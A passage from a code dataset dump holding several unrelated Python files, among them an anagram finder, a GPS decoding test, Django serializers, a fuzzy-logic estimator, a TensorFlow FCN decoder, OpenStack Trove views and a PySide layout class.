self.updated_at = datetime.now()\n models.storage.save()\n\n def to_dict(self):\n \"\"\" Return a dictionary type data from class\n \"\"\"\n\n proto_dict = dict(self.__dict__)\n proto_dict[\"__class__\"] = self.__class__.__name__\n proto_dict[\"created_at\"] = self.created_at.isoformat()\n proto_dict[\"updated_at\"] = self.updated_at.isoformat()\n\n return proto_dict\n","repo_name":"dev-loup/AirBnB_clone","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
{"seq_id":"12547653635","text":"\"\"\"\nFile: anagram.py\nName:\n----------------------------------\nThis program recursively finds all the anagram(s)\nfor the word input by user and terminates when the\ninput string matches the EXIT constant defined\nat line 19\n\nIf you correctly implement this program, you should see the\nnumber of anagrams for each word listed below:\n * arm -> 3 anagrams\n * contains -> 5 anagrams\n * stop -> 6 anagrams\n * tesla -> 10 anagrams\n * spear -> 12 anagrams\n\"\"\"\n\nimport time\n\n# Constants\nFILE = 'dictionary.txt' # This is the filename of an English dictionary\nEXIT = '-1' # Controls when to stop the loop\nALPHABET = 'abcdefghijklmnopqrstuvwxyz'\n\n# Global Variable\n# dict_list = []\ndictionary = [set()for i in range(26)]\n\n\ndef main():\n print('Welcome to stanCode \"Anagram Generator\" (or -1 to quit)')\n # load the dictionary once instead of re-reading the file on every loop pass\n read_dictionary()\n while True:\n start = time.time()\n anagrams = input('Find anagrams for: ')\n if anagrams == 
EXIT:\n            break\n        else:\n            s = [item for item in anagrams]\n            find_anagrams(s)\n        end = time.time()\n        print(end - start)\n\n\ndef read_dictionary():\n    with open(FILE, 'r') as f:\n        for line in f:\n            # global dict_list\n            dictionary[ALPHABET.find(line[0])].add(line.lower().strip())\n\n\ndef find_anagrams(s):\n    \"\"\"\n    :param s: list, the word input by user\n    :return: None, prints the number of total anagrams and the word list\n    \"\"\"\n    word_lst = []\n    helper(s, [], word_lst)\n    print(str(len(word_lst)) + \" anagrams: \" + str(word_lst))\n\n\ndef helper(lst, word, word_lst):\n    \"\"\"\n    :param lst: list, the word input by user\n    :param word: list, put the index of anagram\n    :param word_lst: list, put the anagrams that are found in dictionary\n    \"\"\"\n    # Base case\n    if len(lst) == len(word):\n        word_str = \"\"\n        for order in word:\n            word_str += lst[int(order)]\n        # if has_prefix(word_str):\n        if len(word_str) == len(lst):\n            if word_str in dictionary[ALPHABET.find(word_str[0])] and word_str not in word_lst:\n                word_lst.append(word_str)\n                print(\"Searching...\")\n                print(\"Found: \" + word_str)\n    else:\n        for i in range(len(lst)):\n            if i not in word:\n                # Choose\n                word.append(i)\n                # Explore\n                # if has_prefix(word):\n                helper(lst, word, word_lst)\n                # Un-choose\n                word.pop()\n\n\n# def has_prefix(sub_s):\n#     \"\"\"\n#     :param sub_s: list\n#     :return: bool, if the word is prefix, return True\n#     \"\"\"\n#     for item in dict_list:\n#         if item.startswith(\"\".join(sub_s)):\n#             return True\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"JochenMa/stancode_projects","sub_path":"stancode_projects/anagram/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37167475128","text":"import unittest\nfrom oars_gb_pkg.nodes.sensing.airmar import AirmarParser\nfrom geometry_msgs.msg import Pose2D\n\n\nclass TestAirmarMessageDecoding(unittest.TestCase):\n    \"\"\"\n    Tests the decoding of Airmar GPS (GPGLL) messages into Pose2D positions.\n    \"\"\"\n\n    def setUp(self):\n        self.parser = AirmarParser(port=None, use_ros=False)\n        # msg = '$GPGLL,4217.6274,N,07115.8634,W,202754.00,A,A*71'.split(',')\n\n    def test_gps_message_decoding(self):\n        msg = '$GPGLL,3500.0000,N,02500.0000,E,202754.00,A,A*71'.split(',')\n        expected_output = Pose2D(x=25, y=35)\n        self.assertEqual(self.parser.handle_gps_message(msg), expected_output)\n\n        msg = '$GPGLL,3500.0000,S,02500.0000,W,202754.00,A,A*71'.split(',')\n        expected_output = Pose2D(x=-25, y=-35)\n        self.assertEqual(self.parser.handle_gps_message(msg), expected_output)\n\n        msg = '$GPGLL,1510.2500,N,02515.5000,E,202754.00,A,A*71'.split(',')\n        expected_output = Pose2D(x=self.to_deg(25, 15.5), y=self.to_deg(15, 10.25))\n        self.assertEqual(self.parser.handle_gps_message(msg), expected_output)\n\n        msg = '$GPGLL,0001.0200,S,00500.1000,E,202754.00,A,A*71'.split(',')\n        expected_output = Pose2D(x=self.to_deg(5, 0.1), y=self.to_deg(0, -1.02))\n        self.assertEqual(self.parser.handle_gps_message(msg), expected_output)\n\n        msg = '$GPGLL,8024.1230,S,12501.2000,E,202754.00,A,A*71'.split(',')\n        expected_output = Pose2D(x=self.to_deg(125, 1.2), y=self.to_deg(-80, 24.123))\n        self.assertEqual(self.parser.handle_gps_message(msg), expected_output)\n\n    @staticmethod\n    def to_deg(degrees, minutes):\n        return degrees + minutes / 60.0 if degrees >= 0 else degrees - minutes / 60.0\n\n\nif __name__ == '__main__':\n    # Run the tests\n    unittest.main()\n","repo_name":"olin-ars/trans-atlantic-sailboat","sub_path":"tests/test_airmar_message_decoding.py","file_name":"test_airmar_message_decoding.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"30992104091","text":"#This Python script creates 2 lists from a data file I have.\n#One list will contain all the files that start with the term ‘stats’ in it.\n#The second list will contain all files that have the term ‘thresholds.bbt.db’ in it. \n#!/Library/Frameworks/Python.framework/Versions/3.6/bin/python3\n#print the python version\nimport sys\nprint(sys.version)\n\n#to show if the file exists\nimport os\na=os.path.isfile(sys.argv[1])\nprint(a)\n\n#open file and search for targeted key words, put in 2 lists\nlist1=[]\nlist2=[]\nwith open(sys.argv[1], 'r') as f:\n    data = f.readlines()\n    for line in data:\n        if line.__contains__('stats'):\n            list1.append(line)\n        if line.__contains__('thresholds.bbt.db'):\n            list2.append(line)\n#sort the lists and write them in separate text files\nwith open('list1.txt','w') as f:\n    for line in sorted(list1):\n        f.write(line)\n\nwith open('list2.txt','w') as f:\n    for line in sorted(list2):\n        f.write(line)\n","repo_name":"nazaninsh/Bioinformatics","sub_path":"gsc.py","file_name":"gsc.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32765091188","text":"from rest_framework import serializers\nfrom django.contrib.auth.hashers import make_password\nfrom cryptography.fernet import Fernet\nfrom django.conf import settings\nfrom .models import (ShopCredentials, Shipments, ShipmentsItems,\n                     Transport, CustomerDetails, shopRequestLog,\n                     tokenRequestLog)\n\n\nclass ShopCredentialsSerializer(serializers.ModelSerializer):\n\n    def _encrypt(self, clientSecret):\n        return Fernet(settings.SHOP_KEY).encrypt(bytes(clientSecret, 'utf-8'))\n\n    def create(self, validated_data):\n        new_validated_data = {\n            \"shopName\": validated_data['shopName'],\n            \"clientId\": validated_data['clientId'],\n            \"clientSecret\": self._encrypt(validated_data['clientSecret'])\n        }\n        return super().create(new_validated_data)\n\n    class Meta:\n        model = ShopCredentials\n        fields = ('shopId', 'shopName', 'clientId',\n                  'clientSecret', 'clientToken')\n\n\nclass ShipmentsSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Shipments\n        fields = ('shipmentId', 'shipmentDate', 'shipmentReference',\n                  'transportId', 'shopId', 'orderItemId', 'orderId')\n\n\nclass ShipmentsItemsSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = ShipmentsItems\n        fields = ('pickUpPoint', 'orderItemId', 'orderId', 'orderDate',\n                  'latestDeliveryDate', 'ean', 'title', 'quantity', 'offerPrice',\n                  'offerCondition', 'offerReference', 'fulfilmentMethod',\n                  'shipmentId')\n\n\nclass TransportSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Transport\n        fields = ('transportId', 'transporterCode', 'trackAndTrace',\n                  'shipmentId')\n\n\nclass CustomerDetailsSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = CustomerDetails\n        fields = ('salutationCode', 'zipCode', 'countryCode', 'shipmentId')\n\n\nclass tokenRequestLogSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = tokenRequestLog\n        fields = ('taskId', 'completed', 'shopId')\n\n\nclass shopRequestLogSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = shopRequestLog\n        fields = 
('taskId', 'completed', 'shopId')\n","repo_name":"taiseii/API-sync","sub_path":"bol_client/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71585400742","text":"import gegede.builder\nfrom duneggd.LocalTools import localtools as ltools\nfrom gegede import Quantity as Q\n\nclass SandInnerVolumeBuilder(gegede.builder.Builder):\n def configure( self, halfDimension=None, Material=None, nBarrelModules=None, GRAINThickness=None, clearenceECALGRAIN=None, clearenceGRAINTracker=None, clearenceTrackerECAL=None,**kwds):\n self.halfDimension = halfDimension\n self.Material = Material\n self.kloeVesselRadius = self.halfDimension['rmax']\n self.kloeVesselHalfDx = self.halfDimension['dz']\n self.nBarrelModules = nBarrelModules\n self.rotAngle = 0.5 * Q('360deg') / self.nBarrelModules\n self.GRAINThickness = GRAINThickness\n\n self.clearenceECALGRAIN = clearenceECALGRAIN\n self.clearenceGRAINTracker = clearenceGRAINTracker\n self.clearenceTrackerECAL = clearenceTrackerECAL\n\n def construct(self,geom):\n sand_inner_volume_shape = geom.shapes.PolyhedraRegular(\"sand_inner_volume_shape\",numsides=self.nBarrelModules, rmin=Q('0cm'), rmax=self.kloeVesselRadius , dz=self.kloeVesselHalfDx, sphi=self.rotAngle)\n #sand_inner_volume_shape = geom.shapes.Tubs(\"sand_inner_volume_shape\", rmin = Q(\"0mm\"), rmax = self.kloeVesselRadius, dz=self.kloeVesselHalfDx/2)\n main_lv = geom.structure.Volume('sand_inner_volume', material=self.Material, shape=sand_inner_volume_shape)\n self.add_volume( main_lv )\n self.build_tracker(main_lv, geom)\n self.build_grain(main_lv, geom)\n\n def build_tracker(self, main_lv, geom):\n # if \"STT\" not in self.builders:\n # print(\"STT builder not found\")\n # return \n if \"STT\" in self.builders:\n print(\"STT builder found\")\n tracker_builder=self.get_builder(\"STT\")\n elif \"SAND_TRACKER\" in self.builders:\n tracker_builder=self.get_builder(\"SAND_TRACKER\")\n else:\n print(\"no SAND tracker found\")\n return\n \n \n tracker_lv=tracker_builder.get_volume()\n\n tracker_position = geom.structure.Position(\n 'tracker_position', Q('0m'), Q('0m'), Q('0m'))\n\n tracker_rotation = geom.structure.Rotation(\n 'tracker_rotation', Q('0deg'), Q('180deg'), Q('0deg'))\n\n tracker_placement = geom.structure.Placement('tracker_place',\n volume=tracker_lv,\n pos=tracker_position,\n rot=tracker_rotation)\n\n main_lv.placements.append(tracker_placement.name) \n\n def build_grain(self, main_lv, geom):\n if \"GRAIN\" not in self.builders:\n print(\"GRAIN builder not found\")\n return \n\n grain_builder=self.get_builder(\"GRAIN\")\n grain_lv=grain_builder.get_volume()\n \n grain_position = geom.structure.Position(\"grain_position\",\n self.kloeVesselRadius - 0.5*self.GRAINThickness - self.clearenceECALGRAIN,\n Q('0mm'),\n Q('0mm'))\n\n grain_rotation = geom.structure.Rotation(\n 'grain_rotation', Q('0deg'), Q('0deg'), Q('0deg'))\n\n grain_placement = geom.structure.Placement('grain_place',\n volume=grain_lv,\n pos=grain_position,\n rot=grain_rotation)\n main_lv.placements.append(grain_placement.name) \n ","repo_name":"DUNE/dunendggd","sub_path":"duneggd/SubDetector/SandInnerVolume.py","file_name":"SandInnerVolume.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10099769857","text":"# -*- coding: utf-8 -*-\n# @Time : 18-12-07\n# @Author : Yang Jiao\n# 
@Site : http://github.com/mrjiao2018\n# @File : fcn_decoder.py\n# @IDE : PyCharm Community Edition\n\nimport tensorflow as tf\nfrom encoder_decoder_model import cnn_base_model\nfrom encoder_decoder_model import vgg_encoder\nfrom encoder_decoder_model import dense_encoder\n\"\"\"\npacking FCN \n\"\"\"\n\nclass FCNDecoder(cnn_base_model.CNNBaseModel):\n \"\"\"\n packing FCN\n \"\"\"\n def __init__(self, phase):\n super(FCNDecoder, self).__init__()\n self._train_phase = tf.constant('train', dtype=tf.string)\n self._phase = phase\n self._is_training = self._init_phase()\n\n def _init_phase(self):\n \"\"\"\n :return:\n \"\"\"\n return tf.equal(self._phase, self._train_phase)\n\n def decode(self, input_tensor_dict, decode_layer_list, name):\n \"\"\"\n using deconv to decode the network and get pixel feature info\n\n :param input_tensor_dict:\n :param decode_layer_list: those layers which need to be decoded\n need to be written from deep to shallow\n eg. ['pool5', 'pool4', 'pool3']\n :param name:\n :return:\n \"\"\"\n ret = dict()\n\n with tf.variable_scope(name):\n # score stage 1\n input_tensor = input_tensor_dict[decode_layer_list[0]]['data']\n\n score = self.conv2d(input_data=input_tensor, out_channel=64,\n kernel_size=1, use_bias=False, name='score_origin')\n decode_layer_list = decode_layer_list[1:]\n for i in range(len(decode_layer_list)):\n deconv = self.deconv2d(input_data=score, out_channel=64, kernel_size=4,\n stride=2, use_bias=False, name='deconv_{:d}'.format(i + 1))\n input_tensor = input_tensor_dict[decode_layer_list[i]]['data']\n score = self.conv2d(input_data=input_tensor, out_channel=64,\n kernel_size=1, use_bias=False, name='score_{:d}'.format(i + 1))\n fused = tf.add(deconv, score, name='fuse_{:d}'.format(i + 1))\n score = fused\n\n deconv_final = self.deconv2d(input_data=score, out_channel=64, kernel_size=16,\n stride=8, use_bias=False, name='deconv_final')\n\n score_final = self.conv2d(input_data=deconv_final, out_channel=2,\n kernel_size=1, use_bias=False, name='score_final')\n\n ret['logits'] = score_final\n ret['deconv'] = deconv_final\n\n return ret\n\n\nif __name__ == '__main__':\n\n vgg_encoder = vgg_encoder.VGG16Encoder(phase=tf.constant('train', tf.string))\n dense_encoder = dense_encoder.DenseEncoder(L=40, growth_rate=12,\n with_bc=True, phase='train', N=5)\n decoder = FCNDecoder(phase='train')\n\n in_tensor = tf.placeholder(dtype=tf.float32, shape=[None, 256, 512, 3],\n name='input')\n\n vgg_encode_ret = vgg_encoder.encode(in_tensor, name='vgg_encoder')\n dense_encode_ret = dense_encoder.encode(in_tensor, name='dense_encoder')\n decode_ret = decoder.decode(vgg_encode_ret, name='decoder',\n decode_layer_list=['pool5',\n 'pool4',\n 'pool3'])\n print(decode_ret)","repo_name":"mrjiao2018/lane-detection","sub_path":"encoder_decoder_model/fcn_decoder.py","file_name":"fcn_decoder.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33862148509","text":"from fastapi_mail import ConnectionConfig, FastMail, MessageSchema\nfrom ..settings import settings\n\nmail_config = ConnectionConfig(\n MAIL_USERNAME=settings.mail_username,\n MAIL_PASSWORD=settings.mail_password,\n MAIL_FROM=settings.mail_from,\n MAIL_SERVER=\"smtp.gmail.com\",\n MAIL_PORT=settings.mail_port,\n MAIL_STARTTLS=True,\n MAIL_SSL_TLS=False,\n)\n\nfm = FastMail(mail_config)\n\n\nasync def send_email(to: str, subject: str, body: str):\n message = MessageSchema(\n subject=subject,\n recipients=[to],\n 
body=body,\n subtype=\"html\",\n )\n await fm.send_message(message)\n","repo_name":"tora-o/reservation-system-backend","sub_path":"reservation_system/utils/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24453572194","text":"import fuzzy_tools as fuzz\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy import cos, sin\nimport random\n\n# no. of iterations\nn_steps = 200\n\n# no. of rules\nn_rules = 5\n\nlam1 = 0.001\nlam2 = 0.001\nlam3 = 0.001\n\n# universe\nx = np.linspace(0, 6, 1000)\n\n# function to estimate\ng = x - cos(1.5*x) + sin(0.4*x)\n\n# training data pairs\nx_train = np.random.rand(n_steps,)*6.0\n\n# to get output data point\ndef get_y(data_point_x):\n return data_point_x - cos(1.5*data_point_x) + sin(0.4*data_point_x)\n\n# to update the fuzzy sets with lates paramter value\ndef update_fuzzy_sets(memship, c, sig):\n for i in range(len(memship)):\n memship[i].params = [c[i, 0], sig[i, 0], \"none\"]\n\n return memship\n\ndef get_rule_premise(x, memship):\n rule_premise = np.zeros((n_rules, 1))\n for i in range(len(memship)):\n fuzz.fuzzify(x, memship[i])\n rule_premise[i, 0] = memship[i].fuzz_val\n return rule_premise\n\ndef fuzzy_grad_des(data_point_x, f, b, c, sig, premise):\n e = f - get_y(data_point_x)\n basis_func = premise/np.sum(premise)\n b_next = np.zeros_like(b)\n c_next = np.zeros_like(c)\n sig_next = np.zeros_like(sig)\n\n for i in range(n_rules):\n # update output singleton positions\n b_next[i,0] = b[i,0] - lam1*e*basis_func[i,0]\n\n # update input fuzzy set centres\n c_next[i,0] = c[i,0] - lam2*e*premise[i,0]*((data_point_x - c[i,0])/(sig[i,0]**2))*((b[i,0] - f)/np.sum(premise))\n\n # update input fuzzy set spreads\n sig_next[i,0] = sig[i,0] - lam3*e*((b[i,0] - f)/np.sum(premise))*premise[i,0]*(((data_point_x - c[i,0])**2)/(sig[i,0])**3)\n\n return [b_next, c_next, sig_next]\n\ndef simulate(memship, b_0, c_0, sig_0):\n for i in range(n_steps):\n data_point_x = x_train[i]\n\n # initial step\n if i == 0:\n # get estimate of function\n premise = get_rule_premise(data_point_x, memship)\n f = np.dot(np.transpose(b_0), premise)\n # get updated params\n b_next, c_next, sig_next = fuzzy_grad_des(data_point_x, f, b_0, c_0, sig_0, premise)\n memship = update_fuzzy_sets(memship, c_next, sig_next)\n\n else:\n # get estimate of function\n premise = get_rule_premise(data_point_x, memship)\n f = np.dot(np.transpose(b_next), premise)\n # get updated params\n b_next, c_next, sig_next = fuzzy_grad_des(data_point_x, f, b_next, c_next, sig_next, premise)\n memship = update_fuzzy_sets(memship, c_next, sig_next)\n\n return [b_next, c_next, sig_next]\n\ndef compare(b, c, sig, memship):\n fuzz_basis = np.zeros((len(x) ,n_rules))\n memship = update_fuzzy_sets(memship, c, sig)\n temp = np.zeros((n_rules,))\n for i in range(len(x)):\n for j in range(n_rules):\n fuzz.fuzzify(x[i], memship[j])\n temp[j] = memship[j].fuzz_val\n fuzz_basis[i] = temp/np.sum(temp)\n\n g_cap = np.zeros_like(x)\n for i in range(len(x)):\n g_cap[i] = b[0]*fuzz_basis[i,0] + b[1]*fuzz_basis[i,1] + b[2]*fuzz_basis[i,2] + b[3]*fuzz_basis[i,3] + b[4]*fuzz_basis[i,4]\n\n plt.plot(x, g, x, g_cap)\n plt.show()\n\ndef main():\n # create fuzzy system\n # initial fuzzy set parameters\n b_0 = np.random.rand(5, 1)*15.0\n c_0 = np.random.rand(5, 1)*6.0\n sig_0 = np.random.rand(5, 1)*2.0\n\n # create fuzzy sets\n memship = []\n for i in range(len(b_0)):\n p = [c_0[i, 0], sig_0[i, 0], 
\"none\"]\n memship.append(fuzz.membership(\"gauss\", p, x, \"none\"))\n\n b, c, sig = simulate(memship, b_0, c_0, sig_0)\n memship = update_fuzzy_sets(memship, c, sig)\n b, c, sig = simulate(memship, b, c, sig)\n memship = update_fuzzy_sets(memship, c, sig)\n b, c, sig = simulate(memship, b, c, sig)\n memship = update_fuzzy_sets(memship, c, sig)\n b, c, sig = simulate(memship, b, c, sig)\n memship = update_fuzzy_sets(memship, c, sig)\n b, c, sig = simulate(memship, b, c, sig)\n memship = update_fuzzy_sets(memship, c, sig)\n b, c, sig = simulate(memship, b, c, sig)\n memship = update_fuzzy_sets(memship, c, sig)\n \n compare(b, c, sig, memship)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Thalaivar/python","sub_path":"control/fuzzy_control/fuzzy_gradient.py","file_name":"fuzzy_gradient.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"} +{"seq_id":"74330345380","text":"from collections import OrderedDict\nimport logging\n\nfrom django.core.urlresolvers import reverse\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom horizon import exceptions\nfrom horizon import forms as horizon_forms\nfrom horizon import tables as horizon_tables\nfrom horizon import tabs as horizon_tabs\nfrom horizon.utils import memoized\n\nfrom openstack_dashboard.contrib.trove import api\nfrom openstack_dashboard.contrib.trove.content.database_clusters import forms\nfrom openstack_dashboard.contrib.trove.content.database_clusters import tables\nfrom openstack_dashboard.contrib.trove.content.database_clusters import tabs\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass IndexView(horizon_tables.DataTableView):\n table_class = tables.ClustersTable\n template_name = 'project/database_clusters/index.html'\n\n def has_more_data(self, table):\n return self._more\n\n @memoized.memoized_method\n def get_flavors(self):\n try:\n flavors = api.trove.flavor_list(self.request)\n except Exception:\n flavors = []\n msg = _('Unable to retrieve database size information.')\n exceptions.handle(self.request, msg)\n return OrderedDict((unicode(flavor.id), flavor) for flavor in flavors)\n\n def _extra_data(self, cluster):\n try:\n cluster_flavor = cluster.instances[0][\"flavor\"][\"id\"]\n flavors = self.get_flavors()\n flavor = flavors.get(cluster_flavor)\n if flavor is not None:\n cluster.full_flavor = flavor\n except Exception:\n # ignore any errors and just return cluster unaltered\n pass\n return cluster\n\n def get_data(self):\n marker = self.request.GET.get(\n tables.ClustersTable._meta.pagination_param)\n # Gather our clusters\n try:\n clusters = api.trove.cluster_list(self.request, marker=marker)\n self._more = clusters.next or False\n except Exception:\n self._more = False\n clusters = []\n msg = _('Unable to retrieve database clusters.')\n exceptions.handle(self.request, msg)\n\n map(self._extra_data, clusters)\n\n return clusters\n\n\nclass LaunchClusterView(horizon_forms.ModalFormView):\n form_class = forms.LaunchForm\n template_name = 'project/database_clusters/launch.html'\n success_url = reverse_lazy('horizon:project:database_clusters:index')\n\n\nclass DetailView(horizon_tabs.TabbedTableView):\n tab_group_class = tabs.ClusterDetailTabs\n template_name = 'project/database_clusters/detail.html'\n\n page_title = _(\"Cluster Details: {{ cluster.name }}\")\n\n def get_context_data(self, **kwargs):\n context = super(DetailView, self).get_context_data(**kwargs)\n 
context[\"cluster\"] = self.get_data()\n return context\n\n @memoized.memoized_method\n def get_data(self):\n try:\n cluster_id = self.kwargs['cluster_id']\n cluster = api.trove.cluster_get(self.request, cluster_id)\n except Exception:\n redirect = reverse('horizon:project:database_clusters:index')\n msg = _('Unable to retrieve details '\n 'for database cluster: %s') % cluster_id\n exceptions.handle(self.request, msg, redirect=redirect)\n try:\n cluster.full_flavor = api.trove.flavor_get(\n self.request, cluster.instances[0][\"flavor\"][\"id\"])\n except Exception:\n LOG.error('Unable to retrieve flavor details'\n ' for database cluster: %s' % cluster_id)\n cluster.num_instances = len(cluster.instances)\n\n # Todo(saurabhs) Set mgmt_url to dispaly Mgmt Console URL on\n # cluster details page\n # for instance in cluster.instances:\n # if instance['type'] == \"master\":\n # cluster.mgmt_url = \"https://%s:5450/webui\" % instance['ip'][0]\n\n return cluster\n\n def get_tabs(self, request, *args, **kwargs):\n cluster = self.get_data()\n return self.tab_group_class(request, cluster=cluster, **kwargs)\n\n\nclass AddShardView(horizon_forms.ModalFormView):\n form_class = forms.AddShardForm\n template_name = 'project/database_clusters/add_shard.html'\n success_url = reverse_lazy('horizon:project:database_clusters:index')\n page_title = _(\"Add Shard\")\n\n def get_context_data(self, **kwargs):\n context = super(AddShardView, self).get_context_data(**kwargs)\n context[\"cluster_id\"] = self.kwargs['cluster_id']\n return context\n\n def get_object(self, *args, **kwargs):\n if not hasattr(self, \"_object\"):\n cluster_id = self.kwargs['cluster_id']\n try:\n self._object = api.trove.cluster_get(self.request, cluster_id)\n # TODO(michayu): assumption that cluster is homogeneous\n flavor_id = self._object.instances[0]['flavor']['id']\n flavors = self.get_flavors()\n if flavor_id in flavors:\n self._object.flavor_name = flavors[flavor_id].name\n else:\n flavor = api.trove.flavor_get(self.request, flavor_id)\n self._object.flavor_name = flavor.name\n except Exception:\n redirect = reverse(\"horizon:project:database_clusters:index\")\n msg = _('Unable to retrieve cluster details.')\n exceptions.handle(self.request, msg, redirect=redirect)\n return self._object\n\n def get_flavors(self, *args, **kwargs):\n if not hasattr(self, \"_flavors\"):\n try:\n flavors = api.trove.flavor_list(self.request)\n self._flavors = OrderedDict([(str(flavor.id), flavor)\n for flavor in flavors])\n except Exception:\n redirect = reverse(\"horizon:project:database_clusters:index\")\n exceptions.handle(\n self.request,\n _('Unable to retrieve flavors.'), redirect=redirect)\n return self._flavors\n\n def get_initial(self):\n initial = super(AddShardView, self).get_initial()\n _object = self.get_object()\n if _object:\n initial.update(\n {'cluster_id': self.kwargs['cluster_id'],\n 'name': getattr(_object, 'name', None)})\n return initial\n\n\nclass ResetPasswordView(horizon_forms.ModalFormView):\n form_class = forms.ResetPasswordForm\n template_name = 'project/database_clusters/reset_password.html'\n success_url = reverse_lazy('horizon:project:database_clusters:index')\n page_title = _(\"Reset Root Password\")\n\n @memoized.memoized_method\n def get_object(self, *args, **kwargs):\n cluster_id = self.kwargs['cluster_id']\n try:\n return api.trove.cluster_get(self.request, cluster_id)\n except Exception:\n msg = _('Unable to retrieve cluster details.')\n redirect = reverse('horizon:project:database_clusters:index')\n 
exceptions.handle(self.request, msg, redirect=redirect)\n\n def get_context_data(self, **kwargs):\n context = super(ResetPasswordView, self).get_context_data(**kwargs)\n context['cluster_id'] = self.kwargs['cluster_id']\n return context\n\n def get_initial(self):\n return {'cluster_id': self.kwargs['cluster_id']}\n","repo_name":"daolicloud/daolinet-openstack","sub_path":"openstack/openstack-dashboard/openstack_dashboard/contrib/trove/content/database_clusters/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7443,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"40737847693","text":"import sys\nfrom PySide6 import QtCore, QtGui, QtWidgets\nfrom math import floor\n\n\nclass VertexFlowLayout(QtWidgets.QLayout):\n def __init__(self, parent=None, margin=0, spacing=-1):\n super(VertexFlowLayout, self).__init__(parent)\n\n if parent is not None:\n self.setContentsMargins(margin, margin, margin, margin)\n\n self.setSpacing(spacing)\n self.margin = margin\n self.enableAddWidget = False\n self.addLastWidget = None\n \n # spaces between each item\n self.spaceX = 5\n self.spaceY = 5\n\n self.itemList = []\n\n def __del__(self):\n item = self.takeAt(0)\n while item:\n item = self.takeAt(0)\n\n def addItem(self, item):\n if(self.addLastWidget != None and self.addLastWidget != item.wid):\n self.itemList.insert(len(self.itemList) -1, item)\n else:\n self.itemList.append(item)\n \n self.update()\n\n def count(self):\n return len(self.itemList)\n\n def itemAt(self, index):\n if index >= 0 and index < len(self.itemList):\n return self.itemList[index]\n\n return None\n\n def takeAt(self, index):\n if index >= 0 and index < len(self.itemList):\n print(\"remove\", index)\n return self.itemList.pop(index)\n\n return None\n\n def expandingDirections(self):\n return QtCore.Qt.Orientations(QtCore.Qt.Orientation(0))\n\n def hasHeightForWidth(self):\n return True\n\n def heightForWidth(self, width):\n height = self.doLayout(QtCore.QRect(0, 0, width, 0), True)\n \n return height\n\n def setGeometry(self, rect):\n super(VertexFlowLayout, self).setGeometry(rect)\n self.doLayout(rect, False)\n\n def sizeHint(self):\n return self.minimumSize()\n\n def minimumSize(self):\n size = QtCore.QSize()\n\n for item in self.itemList:\n size = size.expandedTo(item.minimumSize())\n\n size += QtCore.QSize(2 * self.margin, 2 * self.margin)\n return size\n \n def addAddWidget(self, addWidget):\n \n if(self.addLastWidget != None):\n self.removeAddWidget()\n self.addLastWidget = addWidget\n self.addWidget(self.addLastWidget)\n \n def removeAddWidget(self):\n \n if(self.addLastWidget):\n self.addLastWidget.deleteLater()\n self.addLastWidget = None\n \n self.update()\n\n def doLayout(self, rect, testOnly):\n x = rect.x()\n y = rect.y()\n lineHeight = 0\n \n \n if(len(self.itemList) > 0):\n self.maxcards = rect.right() / (self.itemList[0].sizeHint().width() + self.spaceX)\n if(self.maxcards<1):\n return\n self.maxcardsint = floor(self.maxcards)\n self.sizepercard = rect.right() / self.maxcardsint\n self.cardheight = self.itemList[0].sizeHint().height() + self.spaceY\n self.cardcount = len(self.itemList) // self.maxcardsint\n self.height = ((self.cardcount + 1) * self.cardheight + self.spaceY)\n\n else: \n return 0\n \n count = 0\n for item in self.itemList:\n print(item)\n column = 0\n rowcount = 0\n if(count != 0): \n column = count // self.maxcardsint\n rowcount = count % self.maxcardsint \n \n\n rowcount = rowcount * self.sizepercard + self.spaceX \n column = 
